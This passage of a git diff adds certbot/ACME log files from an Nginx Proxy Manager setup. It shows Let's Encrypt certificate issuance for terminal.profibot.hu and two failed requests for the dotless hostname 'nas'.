+OIuqVjLB8pEC6yk9enrlrqjXQgkLEYhXzq7dLafv5Vkig6Gl0nuuqjqfp0Q1bi1o +yVNAlXe6aUXw92CcghC9bNsKEO1+M52YY5+ofIXlS/SEQbvVYYBLZ5yeiglV6t3S +M6H+vTG0aP9YHzLn/KVOHzGQfXDP7qM5tkf+7diZe7o2fw6O7IvN6fsQXEQQj8TJ +UXJxv2/uJhcuy/tSDgXwHM8Uk34WNbRT7zGTGkQRX0gsbjAea/jYAoWv0ZvQRwpq +Pe79D/i7Cep8qWnA+7AE/3B3S/3dEEYmc0lpe1366A/6GEgk3ktr9PEoQrLChs6I +tu3wnNLB2euC8IKGLQFpGtOO/2/hiAKjyajaBP25w1jF0Wl8Bbqne3uZ2q1GyPFJ +YRmT7/OXpmOH/FVLtwS+8ng1cAmpCujPwteJZNcDG0sF2n/sc0+SQf49fdyUK0ty ++VUwFj9tmWxyR/M= +-----END CERTIFICATE----- + +2026-01-27 23:22:15,445:DEBUG:acme.client:Storing nonce: 3aiLGgPYsnNHRZzdl4oxWf0cNhsIN7hExo6yAfe6T-gad36ffKY +2026-01-27 23:22:15,446:DEBUG:acme.client:JWS payload: +b'' +2026-01-27 23:22:15,449:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/cert/050c8ad7008ac7c7bfe67ccd2c4b7973741f/1: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICIzYWlMR2dQWXNuTkhSWnpkbDRveFdmMGNOaHNJTjdoRXhvNnlBZmU2VC1nYWQzNmZmS1kiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2NlcnQvMDUwYzhhZDcwMDhhYzdjN2JmZTY3Y2NkMmM0Yjc5NzM3NDFmLzEifQ", + "signature": "K4bYuHiMtkgq1J8YiziWn1yxKkzY202fdMSRNnTsEEpwLE6qBRpe3jZEehWLxyK8wrmG1yJFQKIVYnufbvkWT3PCJS7-DOP8NxTSHt7PM6bSbjUxcgQ60Iz3lTPAxFck_4DteRg_Tdnk1Zu0e1PFoWEaoO2Z5FJFG_9hTsP36xJhDxtmZBp2a1ZITDMSkCCuVGHeqXvplcSI9GOCjtZzNIpqf5NY5Firt-uDNy0D5V96jzr4RpRjFembG7d8IMKVafjzE1ZTz6PxwTueJjbveRdTYLVfackd9sSAzmauOEV5DCP7Cp0NrvY5q8AE34YWjQ2TJyyxqIN8WCe8Zcn0bA", + "payload": "" +} +2026-01-27 23:22:15,608:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/cert/050c8ad7008ac7c7bfe67ccd2c4b7973741f/1 HTTP/1.1" 200 2352 +2026-01-27 23:22:15,609:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Tue, 27 Jan 2026 23:22:15 GMT +Content-Type: application/pem-certificate-chain +Content-Length: 2352 +Connection: keep-alive +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index", ;rel="alternate" +Replay-Nonce: 3aiLGgPYCVQxoTyXyo9GKgcxQBDo8ruphs4htl-9w2tkvcLFVoU +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +-----BEGIN CERTIFICATE----- +MIIDuDCCAz+gAwIBAgISBQyK1wCKx8e/5nzNLEt5c3QfMAoGCCqGSM49BAMDMDIx +CzAJBgNVBAYTAlVTMRYwFAYDVQQKEw1MZXQncyBFbmNyeXB0MQswCQYDVQQDEwJF +NzAeFw0yNjAxMjcyMjIzNDNaFw0yNjA0MjcyMjIzNDJaMB8xHTAbBgNVBAMTFHRl +cm1pbmFsLnByb2ZpYm90Lmh1MHYwEAYHKoZIzj0CAQYFK4EEACIDYgAEEoVjEbEu +BSGcEzFvJ5z/39X14vJk7ASsC7+KB3ECIqjRZjuZmrzJDNPEFKLqtcv4sWAvDJpX +b6NcQLQUmgGAi0c5O1D+jHPyFfifc1t0O8wRGE3t2vQw6BTZKf/Cw2V+o4ICKTCC +AiUwDgYDVR0PAQH/BAQDAgeAMB0GA1UdJQQWMBQGCCsGAQUFBwMBBggrBgEFBQcD +AjAMBgNVHRMBAf8EAjAAMB0GA1UdDgQWBBQn1dxgdbo6x/C9QgKcbkkvnrFU1DAf +BgNVHSMEGDAWgBSuSJ7chx1EoG/aouVgdAR4wpwAgDAyBggrBgEFBQcBAQQmMCQw +IgYIKwYBBQUHMAKGFmh0dHA6Ly9lNy5pLmxlbmNyLm9yZy8wHwYDVR0RBBgwFoIU +dGVybWluYWwucHJvZmlib3QuaHUwEwYDVR0gBAwwCjAIBgZngQwBAgEwLQYDVR0f +BCYwJDAioCCgHoYcaHR0cDovL2U3LmMubGVuY3Iub3JnLzMyLmNybDCCAQsGCisG +AQQB1nkCBAIEgfwEgfkA9wB1AEmcm2neHXzs/DbezYdkprhbrwqHgBnRVVL76esp +3fjDAAABnAHDxSQAAAQDAEYwRAIgZU4So71ktINNySQhQUysS6noNE1+1oSGYF/s +65mcvjQCIAn7PnXUCws1A3h5rwEwUuudTmD7d7RKfv2z96UJJQHYAH4Apcl4kl1X +RheChw3YiWYLXFVki30AQPLsB2hR0YhpGfcAAAGcAcPHxgAIAAAFADBG2foEAwBH +MEUCICox7SZ8xxKtGnntKaSMtjZ3LmBmEhNiBrl3oIj/STYiAiEA8RQiLwzW/uEu +bnYhe+ZRB6PvpCVlBaGdHN87+EK080EwCgYIKoZIzj0EAwMDZwAwZAIwCbJaioYq +nX3Dh2jvGwQbTZqWQo94heOGNUWwYpQtRyQOjWHr3CcplGAeb/11iWGXAjB5el/z +D6DA/e3kP5O9MB82qk/cIzoWOQ6kSE/WjTGeQ/fk5a/tCk5UXjsIFtcw9JI= +-----END CERTIFICATE----- + +-----BEGIN CERTIFICATE----- +MIICtzCCAjygAwIBAgIRAMWKhaLGI0XgqMRSU4efWTowCgYIKoZIzj0EAwMwTzEL +MAkGA1UEBhMCVVMxKTAnBgNVBAoTIEludGVybmV0IFNlY3VyaXR5IFJlc2VhcmNo +IEdyb3VwMRUwEwYDVQQDEwxJU1JHIFJvb3QgWDIwHhcNMjQwMzEzMDAwMDAwWhcN +MjcwMzEyMjM1OTU5WjAyMQswCQYDVQQGEwJVUzEWMBQGA1UEChMNTGV0J3MgRW5j +cnlwdDELMAkGA1UEAxMCRTcwdjAQBgcqhkjOPQIBBgUrgQQAIgNiAARB6ASTCFh/ +vjcwDMCgQer+VtqEkz7JANurZxLP+U9TCeioL6sp5Z8VRvRbYk4P1INBmbefQHJF +HCxcSjKmwtvGBWpl/9ra8HW0QDsUaJW2qOJqceJ0ZVFT3hbUHifBM/2jgfgwgfUw +DgYDVR0PAQH/BAQDAgGGMB0GA1UdJQQWMBQGCCsGAQUFBwMCBggrBgEFBQcDATAS +BgNVHRMBAf8ECDAGAQH/AgEAMB0GA1UdDgQWBBSuSJ7chx1EoG/aouVgdAR4wpwA +gDAfBgNVHSMEGDAWgBR8Qpau3ktIO/qS+J6Mz22LqXI3lTAyBggrBgEFBQcBAQQm +MCQwIgYIKwYBBQUHMAKGFmh0dHA6Ly94Mi5pLmxlbmNyLm9yZy8wEwYDVR0gBAww +CjAIBgZngQwBAgEwJwYDVR0fBCAwHjAcoBqgGIYWaHR0cDovL3gyLmMubGVuY3Iu +b3JnLzAKBggqhkjOPQQDAwNpADBmAjEA/e5N+wjAk945cpaFxGaeMC13fyvdbNzX +lRg9HNdElxi5mXdI4az2CykNU07iFwqEAjEAihPCDkw4b1BvfLg8VNLLuaMpn1Rb +Z1682chR6zNRCseyie4SjyTCdkvsAa+omQSf +-----END CERTIFICATE----- + +2026-01-27 23:22:15,610:DEBUG:acme.client:Storing nonce: 3aiLGgPYCVQxoTyXyo9GKgcxQBDo8ruphs4htl-9w2tkvcLFVoU +2026-01-27 23:22:15,618:INFO:certbot._internal.client:Non-standard path(s), might not work with crontab installed by your operating system package manager +2026-01-27 23:22:15,619:DEBUG:certbot._internal.storage:Creating directory /etc/letsencrypt/archive/npm-18. +2026-01-27 23:22:15,620:DEBUG:certbot._internal.storage:Creating directory /etc/letsencrypt/live/npm-18. +2026-01-27 23:22:15,620:DEBUG:certbot._internal.storage:Writing certificate to /etc/letsencrypt/live/npm-18/cert.pem. +2026-01-27 23:22:15,621:DEBUG:certbot._internal.storage:Writing private key to /etc/letsencrypt/live/npm-18/privkey.pem. +2026-01-27 23:22:15,621:DEBUG:certbot._internal.storage:Writing chain to /etc/letsencrypt/live/npm-18/chain.pem. +2026-01-27 23:22:15,622:DEBUG:certbot._internal.storage:Writing full chain to /etc/letsencrypt/live/npm-18/fullchain.pem. +2026-01-27 23:22:15,622:DEBUG:certbot._internal.storage:Writing README to /etc/letsencrypt/live/npm-18/README. +2026-01-27 23:22:15,632:DEBUG:certbot.configuration:Var account=e417a583de478a0cfdeed332c1113068 (set by user). +2026-01-27 23:22:15,632:DEBUG:certbot.configuration:Var key_type=ecdsa (set by user). +2026-01-27 23:22:15,632:DEBUG:certbot.configuration:Var elliptic_curve=secp384r1 (set by user). +2026-01-27 23:22:15,633:DEBUG:certbot.configuration:Var preferred_chain=ISRG Root X1 (set by user). +2026-01-27 23:22:15,633:DEBUG:certbot.configuration:Var pref_challs=['http-01'] (set by user). +2026-01-27 23:22:15,633:DEBUG:certbot.configuration:Var config_dir=/etc/letsencrypt (set by user). +2026-01-27 23:22:15,633:DEBUG:certbot.configuration:Var work_dir=/tmp/letsencrypt-lib (set by user). +2026-01-27 23:22:15,633:DEBUG:certbot.configuration:Var logs_dir=/data/logs (set by user). +2026-01-27 23:22:15,633:DEBUG:certbot._internal.plugins.selection:Requested authenticator webroot and installer None +2026-01-27 23:22:15,633:DEBUG:certbot._internal.plugins.selection:Requested authenticator webroot and installer None +2026-01-27 23:22:15,633:DEBUG:certbot.configuration:Var webroot_path=['/data/letsencrypt-acme-challenge'] (set by user). +2026-01-27 23:22:15,633:DEBUG:certbot.configuration:Var webroot_map={'terminal.profibot.hu': '/data/letsencrypt-acme-challenge'} (set by user). +2026-01-27 23:22:15,634:DEBUG:certbot._internal.display.obj:Notifying user: +Successfully received certificate. +Certificate is saved at: /etc/letsencrypt/live/npm-18/fullchain.pem +Key is saved at: /etc/letsencrypt/live/npm-18/privkey.pem +This certificate expires on 2026-04-27. +These files will be updated when the certificate renews. +2026-01-27 23:22:15,635:DEBUG:certbot._internal.display.obj:Notifying user: NEXT STEPS: +2026-01-27 23:22:15,635:DEBUG:certbot._internal.display.obj:Notifying user: - The certificate will need to be renewed before it expires. Certbot can automatically renew the certificate in the background, but you may need to take steps to enable that functionality. See https://certbot.org/renewal-setup for instructions. +2026-01-27 23:22:15,636:DEBUG:certbot._internal.display.obj:Notifying user: If you like Certbot, please consider supporting our work by: + * Donating to ISRG / Let's Encrypt: https://letsencrypt.org/donate + * Donating to EFF: https://eff.org/donate-le diff --git a/proxy-manager/data/logs/letsencrypt.log.10 b/proxy-manager/data/logs/letsencrypt.log.10 new file mode 100755 index 0000000..9b11b51 --- /dev/null +++ b/proxy-manager/data/logs/letsencrypt.log.10 @@ -0,0 +1,137 @@ +2025-12-25 00:26:43,459:DEBUG:certbot._internal.main:certbot version: 5.1.0 +2025-12-25 00:26:43,459:DEBUG:certbot._internal.main:Location of certbot entry point: /opt/certbot/bin/certbot +2025-12-25 00:26:43,459:DEBUG:certbot._internal.main:Arguments: ['--config', '/etc/letsencrypt.ini', '--work-dir', '/tmp/letsencrypt-lib', '--logs-dir', '/data/logs', '--cert-name', 'npm-9', '--agree-tos', '--authenticator', 'webroot', '-m', 'kincses@gmail.com', '--preferred-challenges', 'http', '--domains', 'NAS'] +2025-12-25 00:26:43,459:DEBUG:certbot._internal.main:Discovered plugins: PluginsRegistry(PluginEntryPoint#manual,PluginEntryPoint#null,PluginEntryPoint#standalone,PluginEntryPoint#webroot) +2025-12-25 00:26:43,469:DEBUG:certbot._internal.log:Root logging level set at 30 +2025-12-25 00:26:43,470:DEBUG:certbot._internal.plugins.selection:Requested authenticator webroot and installer None +2025-12-25 00:26:43,470:DEBUG:certbot._internal.plugins.selection:Single candidate plugin: * webroot +Description: Saves the necessary validation files to a .well-known/acme-challenge/ directory within the nominated webroot path. A separate HTTP server must be running and serving files from the webroot path. HTTP challenge only (wildcards not supported). +Interfaces: Authenticator, Plugin +Entry point: EntryPoint(name='webroot', value='certbot._internal.plugins.webroot:Authenticator', group='certbot.plugins') +Initialized: +Prep: True +2025-12-25 00:26:43,470:DEBUG:certbot._internal.plugins.selection:Selected authenticator and installer None +2025-12-25 00:26:43,470:INFO:certbot._internal.plugins.selection:Plugins selected: Authenticator webroot, Installer None +2025-12-25 00:26:43,507:DEBUG:certbot._internal.main:Picked account: +2025-12-25 00:26:43,507:DEBUG:acme.client:Sending GET request to https://acme-v02.api.letsencrypt.org/directory. +2025-12-25 00:26:43,509:DEBUG:urllib3.connectionpool:Starting new HTTPS connection (1): acme-v02.api.letsencrypt.org:443 +2025-12-25 00:26:43,941:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "GET /directory HTTP/1.1" 200 1033 +2025-12-25 00:26:43,942:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Thu, 25 Dec 2025 00:26:43 GMT +Content-Type: application/json +Content-Length: 1033 +Connection: keep-alive +Cache-Control: public, max-age=0, no-cache +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "WZ2L0VcwJxs": "https://community.letsencrypt.org/t/adding-random-entries-to-the-directory/33417", + "keyChange": "https://acme-v02.api.letsencrypt.org/acme/key-change", + "meta": { + "caaIdentities": [ + "letsencrypt.org" + ], + "profiles": { + "classic": "https://letsencrypt.org/docs/profiles#classic", + "shortlived": "https://letsencrypt.org/docs/profiles#shortlived", + "tlsclient": "https://letsencrypt.org/docs/profiles#tlsclient", + "tlsserver": "https://letsencrypt.org/docs/profiles#tlsserver" + }, + "termsOfService": "https://letsencrypt.org/documents/LE-SA-v1.6-August-18-2025.pdf", + "website": "https://letsencrypt.org" + }, + "newAccount": "https://acme-v02.api.letsencrypt.org/acme/new-acct", + "newNonce": "https://acme-v02.api.letsencrypt.org/acme/new-nonce", + "newOrder": "https://acme-v02.api.letsencrypt.org/acme/new-order", + "renewalInfo": "https://acme-v02.api.letsencrypt.org/acme/renewal-info", + "revokeCert": "https://acme-v02.api.letsencrypt.org/acme/revoke-cert" +} +2025-12-25 00:26:43,943:DEBUG:certbot._internal.display.obj:Notifying user: Requesting a certificate for nas +2025-12-25 00:26:43,949:DEBUG:acme.client:Requesting fresh nonce +2025-12-25 00:26:43,950:DEBUG:acme.client:Sending HEAD request to https://acme-v02.api.letsencrypt.org/acme/new-nonce. +2025-12-25 00:26:44,093:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "HEAD /acme/new-nonce HTTP/1.1" 200 0 +2025-12-25 00:26:44,094:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Thu, 25 Dec 2025 00:26:44 GMT +Connection: keep-alive +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index" +Replay-Nonce: GxwILcG0UrPWURe3fNitb6iIML5gPe0pkEuCK58XtFfhhtrGoQ8 +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + + +2025-12-25 00:26:44,094:DEBUG:acme.client:Storing nonce: GxwILcG0UrPWURe3fNitb6iIML5gPe0pkEuCK58XtFfhhtrGoQ8 +2025-12-25 00:26:44,095:DEBUG:acme.client:JWS payload: +b'{\n "identifiers": [\n {\n "type": "dns",\n "value": "nas"\n }\n ]\n}' +2025-12-25 00:26:44,098:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/new-order: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICJHeHdJTGNHMFVyUFdVUmUzZk5pdGI2aUlNTDVnUGUwcGtFdUNLNThYdEZmaGh0ckdvUTgiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL25ldy1vcmRlciJ9", + "signature": "WkheSig5aU-YVlwOcvMr-u29JRUa79lkxSYyb71JwBzSKFWXATVnCswqzLJRm2puloOn3T2dkDszL9poBnfW_0bMVENylL93hfzFQc3hpwDE6GIQHMa7yA-ap8lczjB8sX0KK4BDcHyVUfzDyzc3vH7Md2hwArZaQaB0I5PQNH_bd9gak6x6EvpthzqHuTNoMsrCuc4ms4EkOFWhQQmUfedfLgAmXt_UwCi7Y1BTfLQRqeWNkNLc211K2_dsgc9ulhIO_Vdwqwl7e5lMGE-QHdEOoJFlw61rlwZZFn_clTeJvt4SJabYVxpfbBngpsqGstBfUPz6n3CijsHthF67Wg", + "payload": "ewogICJpZGVudGlmaWVycyI6IFsKICAgIHsKICAgICAgInR5cGUiOiAiZG5zIiwKICAgICAgInZhbHVlIjogIm5hcyIKICAgIH0KICBdCn0" +} +2025-12-25 00:26:44,253:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/new-order HTTP/1.1" 400 187 +2025-12-25 00:26:44,254:DEBUG:acme.client:Received response: +HTTP 400 +Server: nginx +Date: Thu, 25 Dec 2025 00:26:44 GMT +Content-Type: application/problem+json +Content-Length: 187 +Connection: keep-alive +Boulder-Requester: 2906438176 +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index" +Replay-Nonce: GxwILcG05cm3VHlJ6LM8t_GHg8V-worSn48NT3j9Yo5tZCc98tI + +{ + "type": "urn:ietf:params:acme:error:rejectedIdentifier", + "detail": "Invalid identifiers requested :: Cannot issue for \"nas\": Domain name needs at least one dot", + "status": 400 +} +2025-12-25 00:26:44,256:DEBUG:certbot._internal.log:Exiting abnormally: +Traceback (most recent call last): + File "/opt/certbot/bin/certbot", line 7, in + sys.exit(main()) + ^^^^^^ + File "/opt/certbot/lib/python3.11/site-packages/certbot/main.py", line 18, in main + return internal_main.main(cli_args) + ^^^^^^^^^^^^^^^^^^^^^^^^^^^^ + File "/opt/certbot/lib/python3.11/site-packages/certbot/_internal/main.py", line 1850, in main + return config.func(config, plugins) + ^^^^^^^^^^^^^^^^^^^^^^^^^^^^ + File "/opt/certbot/lib/python3.11/site-packages/certbot/_internal/main.py", line 1562, in certonly + lineage = _get_and_save_cert(le_client, config, domains, certname, lineage) + ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ + File "/opt/certbot/lib/python3.11/site-packages/certbot/_internal/main.py", line 141, in _get_and_save_cert + lineage = le_client.obtain_and_enroll_certificate(domains, certname) + ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ + File "/opt/certbot/lib/python3.11/site-packages/certbot/_internal/client.py", line 526, in obtain_and_enroll_certificate + cert, chain, key, _ = self.obtain_certificate(domains) + ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ + File "/opt/certbot/lib/python3.11/site-packages/certbot/_internal/client.py", line 427, in obtain_certificate + orderr = self._get_order_and_authorizations(csr.data, self.config.allow_subset_of_names) + ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ + File "/opt/certbot/lib/python3.11/site-packages/certbot/_internal/client.py", line 487, in _get_order_and_authorizations + orderr = self.acme.new_order(csr_pem, profile=profile) + ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ + File "/opt/certbot/lib/python3.11/site-packages/acme/client.py", line 141, in new_order + response = self._post(self.directory['newOrder'], order) + ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ + File "/opt/certbot/lib/python3.11/site-packages/acme/client.py", line 467, in _post + return self.net.post(*args, **kwargs) + ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ + File "/opt/certbot/lib/python3.11/site-packages/acme/client.py", line 818, in post + return self._post_once(*args, **kwargs) + ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ + File "/opt/certbot/lib/python3.11/site-packages/acme/client.py", line 833, in _post_once + response = self._check_response(response, content_type=content_type) + ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ + File "/opt/certbot/lib/python3.11/site-packages/acme/client.py", line 705, in _check_response + raise messages.Error.from_json(jobj) +acme.messages.Error: urn:ietf:params:acme:error:rejectedIdentifier :: The server will not issue certificates for the identifier :: Invalid identifiers requested :: Cannot issue for "nas": Domain name needs at least one dot +2025-12-25 00:26:44,262:ERROR:certbot._internal.log:An unexpected error occurred: +2025-12-25 00:26:44,262:ERROR:certbot._internal.log:Invalid identifiers requested :: Cannot issue for "nas": Domain name needs at least one dot diff --git a/proxy-manager/data/logs/letsencrypt.log.11 b/proxy-manager/data/logs/letsencrypt.log.11 new file mode 100755 index 0000000..a26590e --- /dev/null +++ b/proxy-manager/data/logs/letsencrypt.log.11 @@ -0,0 +1,137 @@ +2025-12-25 00:26:22,876:DEBUG:certbot._internal.main:certbot version: 5.1.0 +2025-12-25 00:26:22,876:DEBUG:certbot._internal.main:Location of certbot entry point: /opt/certbot/bin/certbot +2025-12-25 00:26:22,876:DEBUG:certbot._internal.main:Arguments: ['--config', '/etc/letsencrypt.ini', '--work-dir', '/tmp/letsencrypt-lib', '--logs-dir', '/data/logs', '--cert-name', 'npm-8', '--agree-tos', '--authenticator', 'webroot', '-m', 'kincses@gmail.com', '--preferred-challenges', 'http', '--domains', 'NAS'] +2025-12-25 00:26:22,876:DEBUG:certbot._internal.main:Discovered plugins: PluginsRegistry(PluginEntryPoint#manual,PluginEntryPoint#null,PluginEntryPoint#standalone,PluginEntryPoint#webroot) +2025-12-25 00:26:22,886:DEBUG:certbot._internal.log:Root logging level set at 30 +2025-12-25 00:26:22,886:DEBUG:certbot._internal.plugins.selection:Requested authenticator webroot and installer None +2025-12-25 00:26:22,886:DEBUG:certbot._internal.plugins.selection:Single candidate plugin: * webroot +Description: Saves the necessary validation files to a .well-known/acme-challenge/ directory within the nominated webroot path. A separate HTTP server must be running and serving files from the webroot path. HTTP challenge only (wildcards not supported). +Interfaces: Authenticator, Plugin +Entry point: EntryPoint(name='webroot', value='certbot._internal.plugins.webroot:Authenticator', group='certbot.plugins') +Initialized: +Prep: True +2025-12-25 00:26:22,887:DEBUG:certbot._internal.plugins.selection:Selected authenticator and installer None +2025-12-25 00:26:22,887:INFO:certbot._internal.plugins.selection:Plugins selected: Authenticator webroot, Installer None +2025-12-25 00:26:22,925:DEBUG:certbot._internal.main:Picked account: +2025-12-25 00:26:22,925:DEBUG:acme.client:Sending GET request to https://acme-v02.api.letsencrypt.org/directory. +2025-12-25 00:26:22,926:DEBUG:urllib3.connectionpool:Starting new HTTPS connection (1): acme-v02.api.letsencrypt.org:443 +2025-12-25 00:26:23,359:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "GET /directory HTTP/1.1" 200 1033 +2025-12-25 00:26:23,359:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Thu, 25 Dec 2025 00:26:23 GMT +Content-Type: application/json +Content-Length: 1033 +Connection: keep-alive +Cache-Control: public, max-age=0, no-cache +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "30tQsADE7Ng": "https://community.letsencrypt.org/t/adding-random-entries-to-the-directory/33417", + "keyChange": "https://acme-v02.api.letsencrypt.org/acme/key-change", + "meta": { + "caaIdentities": [ + "letsencrypt.org" + ], + "profiles": { + "classic": "https://letsencrypt.org/docs/profiles#classic", + "shortlived": "https://letsencrypt.org/docs/profiles#shortlived", + "tlsclient": "https://letsencrypt.org/docs/profiles#tlsclient", + "tlsserver": "https://letsencrypt.org/docs/profiles#tlsserver" + }, + "termsOfService": "https://letsencrypt.org/documents/LE-SA-v1.6-August-18-2025.pdf", + "website": "https://letsencrypt.org" + }, + "newAccount": "https://acme-v02.api.letsencrypt.org/acme/new-acct", + "newNonce": "https://acme-v02.api.letsencrypt.org/acme/new-nonce", + "newOrder": "https://acme-v02.api.letsencrypt.org/acme/new-order", + "renewalInfo": "https://acme-v02.api.letsencrypt.org/acme/renewal-info", + "revokeCert": "https://acme-v02.api.letsencrypt.org/acme/revoke-cert" +} +2025-12-25 00:26:23,360:DEBUG:certbot._internal.display.obj:Notifying user: Requesting a certificate for nas +2025-12-25 00:26:23,363:DEBUG:acme.client:Requesting fresh nonce +2025-12-25 00:26:23,363:DEBUG:acme.client:Sending HEAD request to https://acme-v02.api.letsencrypt.org/acme/new-nonce. +2025-12-25 00:26:23,506:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "HEAD /acme/new-nonce HTTP/1.1" 200 0 +2025-12-25 00:26:23,507:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Thu, 25 Dec 2025 00:26:23 GMT +Connection: keep-alive +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index" +Replay-Nonce: IijzadlSuk_r8p0Ml9FyQAI_imYa7xITniSxPxGAHDTk59I9bsc +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + + +2025-12-25 00:26:23,507:DEBUG:acme.client:Storing nonce: IijzadlSuk_r8p0Ml9FyQAI_imYa7xITniSxPxGAHDTk59I9bsc +2025-12-25 00:26:23,508:DEBUG:acme.client:JWS payload: +b'{\n "identifiers": [\n {\n "type": "dns",\n "value": "nas"\n }\n ]\n}' +2025-12-25 00:26:23,510:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/new-order: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICJJaWp6YWRsU3VrX3I4cDBNbDlGeVFBSV9pbVlhN3hJVG5pU3hQeEdBSERUazU5STlic2MiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL25ldy1vcmRlciJ9", + "signature": "N2M9sh5wF3JtdIQ5PJ70Xuim8MW8CzOqOagRcK6eCXlAeCanx8lwwNWi2uK6-gzM9hd9PpKBMhdhLa6r1E7g5mpGIFHJJmqFeF9RzUz19OMCElDqmH-pMHOrDebxA9D--umzF4Tn_sj_iubVFmCYKnqpFHDgMljOiJgRNiBVjwjkgCIcGoxiVDv5m-ET5Hn1BTqzCn6H6s6L3k1DjASkHiJ6sPjLa5CF6YyRp7leh82SDZDHHePm-fqJ7QnlG_VISz_AguJLY72BlcQHc-jY9mPnuqUCipxSjkJclZOW5qfX9tYu1kXRA61DlyChvdt4O3OCUTYyxTjFYNZbuF0dhw", + "payload": "ewogICJpZGVudGlmaWVycyI6IFsKICAgIHsKICAgICAgInR5cGUiOiAiZG5zIiwKICAgICAgInZhbHVlIjogIm5hcyIKICAgIH0KICBdCn0" +} +2025-12-25 00:26:23,653:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/new-order HTTP/1.1" 400 187 +2025-12-25 00:26:23,654:DEBUG:acme.client:Received response: +HTTP 400 +Server: nginx +Date: Thu, 25 Dec 2025 00:26:23 GMT +Content-Type: application/problem+json +Content-Length: 187 +Connection: keep-alive +Boulder-Requester: 2906438176 +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index" +Replay-Nonce: GxwILcG0AMJAQTFBgzgVlIWvI3j_eHVwqYVLT7xy7ULM7_y72Vo + +{ + "type": "urn:ietf:params:acme:error:rejectedIdentifier", + "detail": "Invalid identifiers requested :: Cannot issue for \"nas\": Domain name needs at least one dot", + "status": 400 +} +2025-12-25 00:26:23,655:DEBUG:certbot._internal.log:Exiting abnormally: +Traceback (most recent call last): + File "/opt/certbot/bin/certbot", line 7, in + sys.exit(main()) + ^^^^^^ + File "/opt/certbot/lib/python3.11/site-packages/certbot/main.py", line 18, in main + return internal_main.main(cli_args) + ^^^^^^^^^^^^^^^^^^^^^^^^^^^^ + File "/opt/certbot/lib/python3.11/site-packages/certbot/_internal/main.py", line 1850, in main + return config.func(config, plugins) + ^^^^^^^^^^^^^^^^^^^^^^^^^^^^ + File "/opt/certbot/lib/python3.11/site-packages/certbot/_internal/main.py", line 1562, in certonly + lineage = _get_and_save_cert(le_client, config, domains, certname, lineage) + ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ + File "/opt/certbot/lib/python3.11/site-packages/certbot/_internal/main.py", line 141, in _get_and_save_cert + lineage = le_client.obtain_and_enroll_certificate(domains, certname) + ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ + File "/opt/certbot/lib/python3.11/site-packages/certbot/_internal/client.py", line 526, in obtain_and_enroll_certificate + cert, chain, key, _ = self.obtain_certificate(domains) + ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ + File "/opt/certbot/lib/python3.11/site-packages/certbot/_internal/client.py", line 427, in obtain_certificate + orderr = self._get_order_and_authorizations(csr.data, self.config.allow_subset_of_names) + 